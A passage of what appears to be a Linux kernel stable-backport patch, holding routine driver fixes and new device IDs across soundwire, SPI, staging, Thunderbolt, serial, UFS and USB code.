+-	ret = pm_runtime_resume_and_get(&slave->dev);
+-	if (ret < 0 && ret != -EACCES)
++	ret = pm_runtime_get_sync(&slave->dev);
++	if (ret < 0 && ret != -EACCES) {
++		pm_runtime_put_noidle(&slave->dev);
+ 		return ret;
++	}
+ 
+ 	ret = sdw_nread_no_pm(slave, addr, count, val);
+ 
+@@ -595,9 +597,11 @@ int sdw_nwrite(struct sdw_slave *slave, u32 addr, size_t count, const u8 *val)
+ {
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&slave->dev);
+-	if (ret < 0 && ret != -EACCES)
++	ret = pm_runtime_get_sync(&slave->dev);
++	if (ret < 0 && ret != -EACCES) {
++		pm_runtime_put_noidle(&slave->dev);
+ 		return ret;
++	}
+ 
+ 	ret = sdw_nwrite_no_pm(slave, addr, count, val);
+ 
+@@ -1565,9 +1569,10 @@ static int sdw_handle_slave_alerts(struct sdw_slave *slave)
+ 
+ 	sdw_modify_slave_status(slave, SDW_SLAVE_ALERT);
+ 
+-	ret = pm_runtime_resume_and_get(&slave->dev);
++	ret = pm_runtime_get_sync(&slave->dev);
+ 	if (ret < 0 && ret != -EACCES) {
+ 		dev_err(&slave->dev, "Failed to resume device: %d\n", ret);
++		pm_runtime_put_noidle(&slave->dev);
+ 		return ret;
+ 	}
+ 
+diff --git a/drivers/soundwire/dmi-quirks.c b/drivers/soundwire/dmi-quirks.c
+index 7969881f126dc..58ea013fa918a 100644
+--- a/drivers/soundwire/dmi-quirks.c
++++ b/drivers/soundwire/dmi-quirks.c
+@@ -73,6 +73,23 @@ static const struct adr_remap hp_omen_16[] = {
+ 	{}
+ };
+ 
++/*
++ * Intel NUC M15 LAPRC510 and LAPRC710
++ */
++static const struct adr_remap intel_rooks_county[] = {
++	/* rt711-sdca on link0 */
++	{
++		0x000020025d071100ull,
++		0x000030025d071101ull
++	},
++	/* rt1316-sdca on link2 */
++	{
++		0x000120025d071100ull,
++		0x000230025d131601ull
++	},
++	{}
++};
++
+ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 	/* TGL devices */
+ 	{
+@@ -98,6 +115,14 @@ static const struct dmi_system_id adr_remap_quirk_table[] = {
+ 		},
+ 		.driver_data = (void *)intel_tgl_bios,
+ 	},
++	{
++		/* quirk used for NUC15 'Rooks County' LAPRC510 and LAPRC710 skews */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel(R) Client Systems"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "LAPRC"),
++		},
++		.driver_data = (void *)intel_rooks_county,
++	},
+ 	{
+ 		.matches = {
+ 			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc"),
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index 866026185c669..21c50972047f5 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
+@@ -1209,6 +1209,9 @@ static int qcom_swrm_get_port_config(struct qcom_swrm_ctrl *ctrl)
+ 	ctrl->num_dout_ports = val;
+ 
+ 	nports = ctrl->num_dout_ports + ctrl->num_din_ports;
++	if (nports > QCOM_SDW_MAX_PORTS)
++		return -EINVAL;
++
+ 	/* Valid port numbers are from 1-14, so mask out port 0 explicitly */
+ 	set_bit(0, &ctrl->dout_port_mask);
+ 	set_bit(0, &ctrl->din_port_mask);
+diff --git a/drivers/spi/spi-imx.c b/drivers/spi/spi-imx.c
+index fbd7b354dd36b..2c660a95c17e7 100644
+--- a/drivers/spi/spi-imx.c
++++ b/drivers/spi/spi-imx.c
+@@ -253,6 +253,18 @@ static bool spi_imx_can_dma(struct spi_controller *controller, struct spi_device
+ 	return true;
+ }
+ 
++/*
++ * Note the number of natively supported chip selects for MX51 is 4. Some
++ * devices may have less actual SS pins but the register map supports 4. When
++ * using gpio chip selects the cs values passed into the macros below can go
++ * outside the range 0 - 3. We therefore need to limit the cs value to avoid
++ * corrupting bits outside the allocated locations.
++ *
++ * The simplest way to do this is to just mask the cs bits to 2 bits. This
++ * still allows all 4 native chip selects to work as well as gpio chip selects
++ * (which can use any of the 4 chip select configurations).
++ */
++
+ #define MX51_ECSPI_CTRL		0x08
+ #define MX51_ECSPI_CTRL_ENABLE		(1 <<  0)
+ #define MX51_ECSPI_CTRL_XCH		(1 <<  2)
+@@ -261,16 +273,16 @@ static bool spi_imx_can_dma(struct spi_controller *controller, struct spi_device
+ #define MX51_ECSPI_CTRL_DRCTL(drctl)	((drctl) << 16)
+ #define MX51_ECSPI_CTRL_POSTDIV_OFFSET	8
+ #define MX51_ECSPI_CTRL_PREDIV_OFFSET	12
+-#define MX51_ECSPI_CTRL_CS(cs)		((cs) << 18)
++#define MX51_ECSPI_CTRL_CS(cs)		((cs & 3) << 18)
+ #define MX51_ECSPI_CTRL_BL_OFFSET	20
+ #define MX51_ECSPI_CTRL_BL_MASK		(0xfff << 20)
+ 
+ #define MX51_ECSPI_CONFIG	0x0c
+-#define MX51_ECSPI_CONFIG_SCLKPHA(cs)	(1 << ((cs) +  0))
+-#define MX51_ECSPI_CONFIG_SCLKPOL(cs)	(1 << ((cs) +  4))
+-#define MX51_ECSPI_CONFIG_SBBCTRL(cs)	(1 << ((cs) +  8))
+-#define MX51_ECSPI_CONFIG_SSBPOL(cs)	(1 << ((cs) + 12))
+-#define MX51_ECSPI_CONFIG_SCLKCTL(cs)	(1 << ((cs) + 20))
++#define MX51_ECSPI_CONFIG_SCLKPHA(cs)	(1 << ((cs & 3) +  0))
++#define MX51_ECSPI_CONFIG_SCLKPOL(cs)	(1 << ((cs & 3) +  4))
++#define MX51_ECSPI_CONFIG_SBBCTRL(cs)	(1 << ((cs & 3) +  8))
++#define MX51_ECSPI_CONFIG_SSBPOL(cs)	(1 << ((cs & 3) + 12))
++#define MX51_ECSPI_CONFIG_SCLKCTL(cs)	(1 << ((cs & 3) + 20))
+ 
+ #define MX51_ECSPI_INT		0x10
+ #define MX51_ECSPI_INT_TEEN		(1 <<  0)
+diff --git a/drivers/staging/axis-fifo/axis-fifo.c b/drivers/staging/axis-fifo/axis-fifo.c
+index dfd2b357f484b..0a85ea667a1b5 100644
+--- a/drivers/staging/axis-fifo/axis-fifo.c
++++ b/drivers/staging/axis-fifo/axis-fifo.c
+@@ -103,17 +103,17 @@
+  *           globals
+  * ----------------------------
+  */
+-static int read_timeout = 1000; /* ms to wait before read() times out */
+-static int write_timeout = 1000; /* ms to wait before write() times out */
++static long read_timeout = 1000; /* ms to wait before read() times out */
++static long write_timeout = 1000; /* ms to wait before write() times out */
+ 
+ /* ----------------------------
+  * module command-line arguments
+  * ----------------------------
+  */
+ 
+-module_param(read_timeout, int, 0444);
++module_param(read_timeout, long, 0444);
+ MODULE_PARM_DESC(read_timeout, "ms to wait before blocking read() timing out; set to -1 for no timeout");
+-module_param(write_timeout, int, 0444);
++module_param(write_timeout, long, 0444);
+ MODULE_PARM_DESC(write_timeout, "ms to wait before blocking write() timing out; set to -1 for no timeout");
+ 
+ /* ----------------------------
+@@ -384,9 +384,7 @@ static ssize_t axis_fifo_read(struct file *f, char __user *buf,
+ 		mutex_lock(&fifo->read_lock);
+ 		ret = wait_event_interruptible_timeout(fifo->read_queue,
+ 			ioread32(fifo->base_addr + XLLF_RDFO_OFFSET),
+-				 (read_timeout >= 0) ?
+-				  msecs_to_jiffies(read_timeout) :
+-				  MAX_SCHEDULE_TIMEOUT);
++			read_timeout);
+ 
+ 		if (ret <= 0) {
+ 			if (ret == 0) {
+@@ -528,9 +526,7 @@ static ssize_t axis_fifo_write(struct file *f, const char __user *buf,
+ 		ret = wait_event_interruptible_timeout(fifo->write_queue,
+ 			ioread32(fifo->base_addr + XLLF_TDFV_OFFSET)
+ 				 >= words_to_write,
+-				 (write_timeout >= 0) ?
+-				  msecs_to_jiffies(write_timeout) :
+-				  MAX_SCHEDULE_TIMEOUT);
++			write_timeout);
+ 
+ 		if (ret <= 0) {
+ 			if (ret == 0) {
+@@ -948,7 +944,17 @@ static struct platform_driver axis_fifo_driver = {
+ 
+ static int __init axis_fifo_init(void)
+ {
+-	pr_info("axis-fifo driver loaded with parameters read_timeout = %i, write_timeout = %i\n",
++	if (read_timeout >= 0)
++		read_timeout = msecs_to_jiffies(read_timeout);
++	else
++		read_timeout = MAX_SCHEDULE_TIMEOUT;
++
++	if (write_timeout >= 0)
++		write_timeout = msecs_to_jiffies(write_timeout);
++	else
++		write_timeout = MAX_SCHEDULE_TIMEOUT;
++
++	pr_info("axis-fifo driver loaded with parameters read_timeout = %li, write_timeout = %li\n",
+ 		read_timeout, write_timeout);
+ 	return platform_driver_register(&axis_fifo_driver);
+ }
+diff --git a/drivers/staging/media/imx/imx-media-capture.c b/drivers/staging/media/imx/imx-media-capture.c
+index 93ba092360105..5cc67786b9169 100644
+--- a/drivers/staging/media/imx/imx-media-capture.c
++++ b/drivers/staging/media/imx/imx-media-capture.c
+@@ -501,14 +501,14 @@ static int capture_legacy_g_parm(struct file *file, void *fh,
+ 				 struct v4l2_streamparm *a)
+ {
+ 	struct capture_priv *priv = video_drvdata(file);
+-	struct v4l2_subdev_frame_interval fi;
++	struct v4l2_subdev_frame_interval fi = {
++		.pad = priv->src_sd_pad,
++	};
+ 	int ret;
+ 
+ 	if (a->type != V4L2_BUF_TYPE_VIDEO_CAPTURE)
+ 		return -EINVAL;
+ 
+-	memset(&fi, 0, sizeof(fi));
+-	fi.pad = priv->src_sd_pad;
+ 	ret = v4l2_subdev_call(priv->src_sd, video, g_frame_interval, &fi);
+ 	if (ret < 0)
+ 		return ret;
+@@ -523,14 +523,14 @@ static int capture_legacy_s_parm(struct file *file, void *fh,
+ 				 struct v4l2_streamparm *a)
+ {
+ 	struct capture_priv *priv = video_drvdata(file);
+-	struct v4l2_subdev_frame_interval fi;
++	struct v4l2_subdev_frame_interval fi = {
++		.pad = priv->src_sd_pad,
++	};
+ 	int ret;
+ 
+ 	if (a->type != V4L2_BUF_TYPE_VIDEO_CAPTURE)
+ 		return -EINVAL;
+ 
+-	memset(&fi, 0, sizeof(fi));
+-	fi.pad = priv->src_sd_pad;
+ 	fi.interval = a->parm.capture.timeperframe;
+ 	ret = v4l2_subdev_call(priv->src_sd, video, s_frame_interval, &fi);
+ 	if (ret < 0)
+diff --git a/drivers/staging/media/imx/imx-media-utils.c b/drivers/staging/media/imx/imx-media-utils.c
+index 3e7462112649d..4985f21b4023f 100644
+--- a/drivers/staging/media/imx/imx-media-utils.c
++++ b/drivers/staging/media/imx/imx-media-utils.c
+@@ -432,15 +432,15 @@ int imx_media_init_cfg(struct v4l2_subdev *sd,
+ 		       struct v4l2_subdev_state *sd_state)
+ {
+ 	struct v4l2_mbus_framefmt *mf_try;
+-	struct v4l2_subdev_format format;
+ 	unsigned int pad;
+ 	int ret;
+ 
+ 	for (pad = 0; pad < sd->entity.num_pads; pad++) {
+-		memset(&format, 0, sizeof(format));
++		struct v4l2_subdev_format format = {
++			.pad = pad,
++			.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++		};
+ 
+-		format.pad = pad;
+-		format.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 		ret = v4l2_subdev_call(sd, pad, get_fmt, NULL, &format);
+ 		if (ret)
+ 			continue;
+diff --git a/drivers/staging/media/omap4iss/iss_video.c b/drivers/staging/media/omap4iss/iss_video.c
+index 60f3d84be8285..8cc8b3ebab11f 100644
+--- a/drivers/staging/media/omap4iss/iss_video.c
++++ b/drivers/staging/media/omap4iss/iss_video.c
+@@ -244,7 +244,9 @@ static int
+ __iss_video_get_format(struct iss_video *video,
+ 		       struct v4l2_mbus_framefmt *format)
+ {
+-	struct v4l2_subdev_format fmt;
++	struct v4l2_subdev_format fmt = {
++		.which = V4L2_SUBDEV_FORMAT_ACTIVE,
++	};
+ 	struct v4l2_subdev *subdev;
+ 	u32 pad;
+ 	int ret;
+@@ -253,9 +255,7 @@ __iss_video_get_format(struct iss_video *video,
+ 	if (!subdev)
+ 		return -EINVAL;
+ 
+-	memset(&fmt, 0, sizeof(fmt));
+ 	fmt.pad = pad;
+-	fmt.which = V4L2_SUBDEV_FORMAT_ACTIVE;
+ 
+ 	mutex_lock(&video->mutex);
+ 	ret = v4l2_subdev_call(subdev, pad, get_fmt, NULL, &fmt);
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+index c1e50084172d8..7e11364d718bf 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.c
+@@ -48,9 +48,9 @@ static const struct rtl819x_ops rtl819xp_ops = {
+ };
+ 
+ static struct pci_device_id rtl8192_pci_id_tbl[] = {
+-	{RTL_PCI_DEVICE(0x10ec, 0x8192, rtl819xp_ops)},
+-	{RTL_PCI_DEVICE(0x07aa, 0x0044, rtl819xp_ops)},
+-	{RTL_PCI_DEVICE(0x07aa, 0x0047, rtl819xp_ops)},
++	{PCI_DEVICE(0x10ec, 0x8192)},
++	{PCI_DEVICE(0x07aa, 0x0044)},
++	{PCI_DEVICE(0x07aa, 0x0047)},
+ 	{}
+ };
+ 
+diff --git a/drivers/staging/rtl8192e/rtl8192e/rtl_core.h b/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
+index 7021f9c435d96..50f1ec78cc457 100644
+--- a/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
++++ b/drivers/staging/rtl8192e/rtl8192e/rtl_core.h
+@@ -55,11 +55,6 @@
+ #define IS_HARDWARE_TYPE_8192SE(_priv)		\
+ 	(((struct r8192_priv *)rtllib_priv(dev))->card_8192 == NIC_8192SE)
+ 
+-#define RTL_PCI_DEVICE(vend, dev, cfg) \
+-	.vendor = (vend), .device = (dev), \
+-	.subvendor = PCI_ANY_ID, .subdevice = PCI_ANY_ID, \
+-	.driver_data = (kernel_ulong_t)&(cfg)
+-
+ #define TOTAL_CAM_ENTRY		32
+ #define CAM_CONTENT_COUNT	8
+ 
+diff --git a/drivers/target/iscsi/iscsi_target.c b/drivers/target/iscsi/iscsi_target.c
+index 3f7a9f7f5f4e3..07e196b44b91d 100644
+--- a/drivers/target/iscsi/iscsi_target.c
++++ b/drivers/target/iscsi/iscsi_target.c
+@@ -4531,6 +4531,9 @@ int iscsit_close_session(struct iscsit_session *sess, bool can_sleep)
+ 	iscsit_stop_time2retain_timer(sess);
+ 	spin_unlock_bh(&se_tpg->session_lock);
+ 
++	if (sess->sess_ops->ErrorRecoveryLevel == 2)
++		iscsit_free_connection_recovery_entries(sess);
++
+ 	/*
+ 	 * transport_deregister_session_configfs() will clear the
+ 	 * struct se_node_acl->nacl_sess pointer now as a iscsi_np process context
+@@ -4554,9 +4557,6 @@ int iscsit_close_session(struct iscsit_session *sess, bool can_sleep)
+ 
+ 	transport_deregister_session(sess->se_sess);
+ 
+-	if (sess->sess_ops->ErrorRecoveryLevel == 2)
+-		iscsit_free_connection_recovery_entries(sess);
+-
+ 	iscsit_free_all_ooo_cmdsns(sess);
+ 
+ 	spin_lock_bh(&se_tpg->session_lock);
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index cfebec107f3fc..0a525f44ea316 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -54,6 +54,21 @@ static int ring_interrupt_index(const struct tb_ring *ring)
+ 	return bit;
+ }
+ 
++static void nhi_mask_interrupt(struct tb_nhi *nhi, int mask, int ring)
++{
++	if (nhi->quirks & QUIRK_AUTO_CLEAR_INT)
++		return;
++	iowrite32(mask, nhi->iobase + REG_RING_INTERRUPT_MASK_CLEAR_BASE + ring);
++}
++
++static void nhi_clear_interrupt(struct tb_nhi *nhi, int ring)
++{
++	if (nhi->quirks & QUIRK_AUTO_CLEAR_INT)
++		ioread32(nhi->iobase + REG_RING_NOTIFY_BASE + ring);
++	else
++		iowrite32(~0, nhi->iobase + REG_RING_INT_CLEAR + ring);
++}
++
+ /*
+  * ring_interrupt_active() - activate/deactivate interrupts for a single ring
+  *
+@@ -61,8 +76,8 @@ static int ring_interrupt_index(const struct tb_ring *ring)
+  */
+ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ {
+-	int reg = REG_RING_INTERRUPT_BASE +
+-		  ring_interrupt_index(ring) / 32 * 4;
++	int index = ring_interrupt_index(ring) / 32 * 4;
++	int reg = REG_RING_INTERRUPT_BASE + index;
+ 	int interrupt_bit = ring_interrupt_index(ring) & 31;
+ 	int mask = 1 << interrupt_bit;
+ 	u32 old, new;
+@@ -123,7 +138,11 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 					 "interrupt for %s %d is already %s\n",
+ 					 RING_TYPE(ring), ring->hop,
+ 					 active ? "enabled" : "disabled");
+-	iowrite32(new, ring->nhi->iobase + reg);
++
++	if (active)
++		iowrite32(new, ring->nhi->iobase + reg);
++	else
++		nhi_mask_interrupt(ring->nhi, mask, index);
+ }
+ 
+ /*
+@@ -136,11 +155,11 @@ static void nhi_disable_interrupts(struct tb_nhi *nhi)
+ 	int i = 0;
+ 	/* disable interrupts */
+ 	for (i = 0; i < RING_INTERRUPT_REG_COUNT(nhi); i++)
+-		iowrite32(0, nhi->iobase + REG_RING_INTERRUPT_BASE + 4 * i);
++		nhi_mask_interrupt(nhi, ~0, 4 * i);
+ 
+ 	/* clear interrupt status bits */
+ 	for (i = 0; i < RING_NOTIFY_REG_COUNT(nhi); i++)
+-		ioread32(nhi->iobase + REG_RING_NOTIFY_BASE + 4 * i);
++		nhi_clear_interrupt(nhi, 4 * i);
+ }
+ 
+ /* ring helper methods */
+diff --git a/drivers/thunderbolt/nhi_regs.h b/drivers/thunderbolt/nhi_regs.h
+index faef165a919cc..6ba2958154770 100644
+--- a/drivers/thunderbolt/nhi_regs.h
++++ b/drivers/thunderbolt/nhi_regs.h
+@@ -93,6 +93,8 @@ struct ring_desc {
+ #define REG_RING_INTERRUPT_BASE	0x38200
+ #define RING_INTERRUPT_REG_COUNT(nhi) ((31 + 2 * nhi->hop_count) / 32)
+ 
++#define REG_RING_INTERRUPT_MASK_CLEAR_BASE	0x38208
++
+ #define REG_INT_THROTTLING_RATE	0x38c00
+ 
+ /* Interrupt Vector Allocation */
+diff --git a/drivers/tty/serial/8250/8250_bcm7271.c b/drivers/tty/serial/8250/8250_bcm7271.c
+index 36e31b96ef4a5..ffc7f67e27e35 100644
+--- a/drivers/tty/serial/8250/8250_bcm7271.c
++++ b/drivers/tty/serial/8250/8250_bcm7271.c
+@@ -1014,7 +1014,7 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 	of_property_read_u32(np, "clock-frequency", &clk_rate);
+ 
+ 	/* See if a Baud clock has been specified */
+-	baud_mux_clk = of_clk_get_by_name(np, "sw_baud");
++	baud_mux_clk = devm_clk_get(dev, "sw_baud");
+ 	if (IS_ERR(baud_mux_clk)) {
+ 		if (PTR_ERR(baud_mux_clk) == -EPROBE_DEFER) {
+ 			ret = -EPROBE_DEFER;
+@@ -1034,7 +1034,7 @@ static int brcmuart_probe(struct platform_device *pdev)
+ 	if (clk_rate == 0) {
+ 		dev_err(dev, "clock-frequency or clk not defined\n");
+ 		ret = -EINVAL;
+-		goto release_dma;
++		goto err_clk_disable;
+ 	}
+ 
+ 	dev_dbg(dev, "DMA is %senabled\n", priv->dma_enabled ? "" : "not ");
+@@ -1121,6 +1121,8 @@ err1:
+ 	serial8250_unregister_port(priv->line);
+ err:
+ 	brcmuart_free_bufs(dev, priv);
++err_clk_disable:
++	clk_disable_unprepare(baud_mux_clk);
+ release_dma:
+ 	if (priv->dma_enabled)
+ 		brcmuart_arbitration(priv, 0);
+@@ -1135,6 +1137,7 @@ static int brcmuart_remove(struct platform_device *pdev)
+ 	hrtimer_cancel(&priv->hrt);
+ 	serial8250_unregister_port(priv->line);
+ 	brcmuart_free_bufs(&pdev->dev, priv);
++	clk_disable_unprepare(priv->baud_mux_clk);
+ 	if (priv->dma_enabled)
+ 		brcmuart_arbitration(priv, 0);
+ 	return 0;
+diff --git a/drivers/tty/serial/8250/8250_core.c b/drivers/tty/serial/8250/8250_core.c
+index 94fbf0add2ce2..81a5dab1a8286 100644
+--- a/drivers/tty/serial/8250/8250_core.c
++++ b/drivers/tty/serial/8250/8250_core.c
+@@ -1157,6 +1157,7 @@ void serial8250_unregister_port(int line)
+ 		uart->port.type = PORT_UNKNOWN;
+ 		uart->port.dev = &serial8250_isa_devs->dev;
+ 		uart->capabilities = 0;
++		serial8250_init_port(uart);
+ 		serial8250_apply_quirks(uart);
+ 		uart_add_one_port(&serial8250_reg, &uart->port);
+ 	} else {
+diff --git a/drivers/tty/serial/8250/8250_exar.c b/drivers/tty/serial/8250/8250_exar.c
+index 64770c62bbec5..b406cba10b0eb 100644
+--- a/drivers/tty/serial/8250/8250_exar.c
++++ b/drivers/tty/serial/8250/8250_exar.c
+@@ -40,9 +40,13 @@
+ #define PCI_DEVICE_ID_COMMTECH_4224PCIE		0x0020
+ #define PCI_DEVICE_ID_COMMTECH_4228PCIE		0x0021
+ #define PCI_DEVICE_ID_COMMTECH_4222PCIE		0x0022
++
+ #define PCI_DEVICE_ID_EXAR_XR17V4358		0x4358
+ #define PCI_DEVICE_ID_EXAR_XR17V8358		0x8358
+ 
++#define PCI_SUBDEVICE_ID_USR_2980		0x0128
++#define PCI_SUBDEVICE_ID_USR_2981		0x0129
++
+ #define PCI_DEVICE_ID_SEALEVEL_710xC		0x1001
+ #define PCI_DEVICE_ID_SEALEVEL_720xC		0x1002
+ #define PCI_DEVICE_ID_SEALEVEL_740xC		0x1004
+@@ -829,6 +833,15 @@ static const struct exar8250_board pbn_exar_XR17V8358 = {
+ 		(kernel_ulong_t)&bd			\
+ 	}
+ 
++#define USR_DEVICE(devid, sdevid, bd) {			\
++	PCI_DEVICE_SUB(					\
++		PCI_VENDOR_ID_USR,			\
++		PCI_DEVICE_ID_EXAR_##devid,		\
++		PCI_VENDOR_ID_EXAR,			\
++		PCI_SUBDEVICE_ID_USR_##sdevid), 0, 0,	\
++		(kernel_ulong_t)&bd			\
++	}
++
+ static const struct pci_device_id exar_pci_tbl[] = {
+ 	EXAR_DEVICE(ACCESSIO, COM_2S, pbn_exar_XR17C15x),
+ 	EXAR_DEVICE(ACCESSIO, COM_4S, pbn_exar_XR17C15x),
+@@ -853,6 +866,10 @@ static const struct pci_device_id exar_pci_tbl[] = {
+ 
+ 	IBM_DEVICE(XR17C152, SATURN_SERIAL_ONE_PORT, pbn_exar_ibm_saturn),
+ 
++	/* USRobotics USR298x-OEM PCI Modems */
++	USR_DEVICE(XR17C152, 2980, pbn_exar_XR17C15x),
++	USR_DEVICE(XR17C152, 2981, pbn_exar_XR17C15x),
++
+ 	/* Exar Corp. XR17C15[248] Dual/Quad/Octal UART */
+ 	EXAR_DEVICE(EXAR, XR17C152, pbn_exar_XR17C15x),
+ 	EXAR_DEVICE(EXAR, XR17C154, pbn_exar_XR17C15x),
+diff --git a/drivers/tty/serial/8250/8250_pci.c b/drivers/tty/serial/8250/8250_pci.c
+index 8e9f247590bd4..cd27821f54ec2 100644
+--- a/drivers/tty/serial/8250/8250_pci.c
++++ b/drivers/tty/serial/8250/8250_pci.c
+@@ -1940,6 +1940,8 @@ pci_moxa_setup(struct serial_private *priv,
+ #define PCI_SUBDEVICE_ID_SIIG_DUAL_30	0x2530
+ #define PCI_VENDOR_ID_ADVANTECH		0x13fe
+ #define PCI_DEVICE_ID_INTEL_CE4100_UART 0x2e66
++#define PCI_DEVICE_ID_ADVANTECH_PCI1600	0x1600
++#define PCI_DEVICE_ID_ADVANTECH_PCI1600_1611	0x1611
+ #define PCI_DEVICE_ID_ADVANTECH_PCI3620	0x3620
+ #define PCI_DEVICE_ID_ADVANTECH_PCI3618	0x3618
+ #define PCI_DEVICE_ID_ADVANTECH_PCIf618	0xf618
+@@ -4105,6 +4107,9 @@ static SIMPLE_DEV_PM_OPS(pciserial_pm_ops, pciserial_suspend_one,
+ 			 pciserial_resume_one);
+ 
+ static const struct pci_device_id serial_pci_tbl[] = {
++	{	PCI_VENDOR_ID_ADVANTECH, PCI_DEVICE_ID_ADVANTECH_PCI1600,
++		PCI_DEVICE_ID_ADVANTECH_PCI1600_1611, PCI_ANY_ID, 0, 0,
++		pbn_b0_4_921600 },
+ 	/* Advantech use PCI_DEVICE_ID_ADVANTECH_PCI3620 (0x3620) as 'PCI_SUBVENDOR_ID' */
+ 	{	PCI_VENDOR_ID_ADVANTECH, PCI_DEVICE_ID_ADVANTECH_PCI3620,
+ 		PCI_DEVICE_ID_ADVANTECH_PCI3620, 0x0001, 0, 0,
+diff --git a/drivers/tty/serial/arc_uart.c b/drivers/tty/serial/arc_uart.c
+index 2a65ea2660e10..f3ccc59d8c1f3 100644
+--- a/drivers/tty/serial/arc_uart.c
++++ b/drivers/tty/serial/arc_uart.c
+@@ -607,10 +607,11 @@ static int arc_serial_probe(struct platform_device *pdev)
+ 	}
+ 	uart->baud = val;
+ 
+-	port->membase = of_iomap(np, 0);
+-	if (!port->membase)
++	port->membase = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(port->membase)) {
+ 		/* No point of dev_err since UART itself is hosed here */
+-		return -ENXIO;
++		return PTR_ERR(port->membase);
++	}
+ 
+ 	port->irq = irq_of_parse_and_map(np, 0);
+ 
+diff --git a/drivers/tty/serial/qcom_geni_serial.c b/drivers/tty/serial/qcom_geni_serial.c
+index 7905935b9f1b4..cf9dc2ddfe664 100644
+--- a/drivers/tty/serial/qcom_geni_serial.c
++++ b/drivers/tty/serial/qcom_geni_serial.c
+@@ -1483,19 +1483,18 @@ static int qcom_geni_serial_probe(struct platform_device *pdev)
+ 	platform_set_drvdata(pdev, port);
+ 	port->handle_rx = console ? handle_rx_console : handle_rx_uart;
+ 
+-	ret = uart_add_one_port(drv, uport);
+-	if (ret)
+-		return ret;
+-
+ 	irq_set_status_flags(uport->irq, IRQ_NOAUTOEN);
+ 	ret = devm_request_irq(uport->dev, uport->irq, qcom_geni_serial_isr,
+ 			IRQF_TRIGGER_HIGH, port->name, uport);
+ 	if (ret) {
+ 		dev_err(uport->dev, "Failed to get IRQ ret %d\n", ret);
+-		uart_remove_one_port(drv, uport);
+ 		return ret;
+ 	}
+ 
++	ret = uart_add_one_port(drv, uport);
++	if (ret)
++		return ret;
++
+ 	/*
+ 	 * Set pm_runtime status as ACTIVE so that wakeup_irq gets
+ 	 * enabled/disabled from dev_pm_arm_wake_irq during system
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index 1dc07f9214d57..01c96537fa36b 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -656,10 +656,17 @@ vcs_write(struct file *file, const char __user *buf, size_t count, loff_t *ppos)
+ 			}
+ 		}
+ 
+-		/* The vcs_size might have changed while we slept to grab
+-		 * the user buffer, so recheck.
++		/* The vc might have been freed or vcs_size might have changed
++		 * while we slept to grab the user buffer, so recheck.
+ 		 * Return data written up to now on failure.
+ 		 */
++		vc = vcs_vc(inode, &viewed);
++		if (!vc) {
++			if (written)
++				break;
++			ret = -ENXIO;
++			goto unlock_out;
++		}
+ 		size = vcs_size(vc, attr, false);
+ 		if (size < 0) {
+ 			if (written)
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index d89ce7fb6b363..977bd4b9dd0b4 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -9058,8 +9058,16 @@ static int __ufshcd_wl_suspend(struct ufs_hba *hba, enum ufs_pm_op pm_op)
+ 			 * that performance might be impacted.
+ 			 */
+ 			ret = ufshcd_urgent_bkops(hba);
+-			if (ret)
++			if (ret) {
++				/*
++				 * If return err in suspend flow, IO will hang.
++				 * Trigger error handler and break suspend for
++				 * error recovery.
++				 */
++				ufshcd_force_error_recovery(hba);
++				ret = -EBUSY;
+ 				goto enable_scaling;
++			}
+ 		} else {
+ 			/* make sure that auto bkops is disabled */
+ 			ufshcd_disable_auto_bkops(hba);
+diff --git a/drivers/ufs/host/ufshcd-pci.c b/drivers/ufs/host/ufshcd-pci.c
+index 1c91f43e15c8e..9c911787f84c6 100644
+--- a/drivers/ufs/host/ufshcd-pci.c
++++ b/drivers/ufs/host/ufshcd-pci.c
+@@ -607,6 +607,7 @@ static const struct pci_device_id ufshcd_pci_tbl[] = {
+ 	{ PCI_VDEVICE(INTEL, 0x51FF), (kernel_ulong_t)&ufs_intel_adl_hba_vops },
+ 	{ PCI_VDEVICE(INTEL, 0x54FF), (kernel_ulong_t)&ufs_intel_adl_hba_vops },
+ 	{ PCI_VDEVICE(INTEL, 0x7E47), (kernel_ulong_t)&ufs_intel_mtl_hba_vops },
++	{ PCI_VDEVICE(INTEL, 0xA847), (kernel_ulong_t)&ufs_intel_mtl_hba_vops },
+ 	{ }	/* terminate list */
+ };
+ 
+diff --git a/drivers/usb/class/usbtmc.c b/drivers/usb/class/usbtmc.c
+index 4bb6d304eb4b2..311007b1d9046 100644
+--- a/drivers/usb/class/usbtmc.c
++++ b/drivers/usb/class/usbtmc.c
+@@ -1928,6 +1928,8 @@ static int usbtmc_ioctl_request(struct usbtmc_device_data *data,
+ 
+ 	if (request.req.wLength > USBTMC_BUFSIZE)
+ 		return -EMSGSIZE;
++	if (request.req.wLength == 0)	/* Length-0 requests are never IN */
++		request.req.bRequestType &= ~USB_DIR_IN;
+ 
+ 	is_in = request.req.bRequestType & USB_DIR_IN;
+ 
+diff --git a/drivers/usb/dwc3/debugfs.c b/drivers/usb/dwc3/debugfs.c
+index 850df0e6bcabf..f0ffd2e5c6429 100644
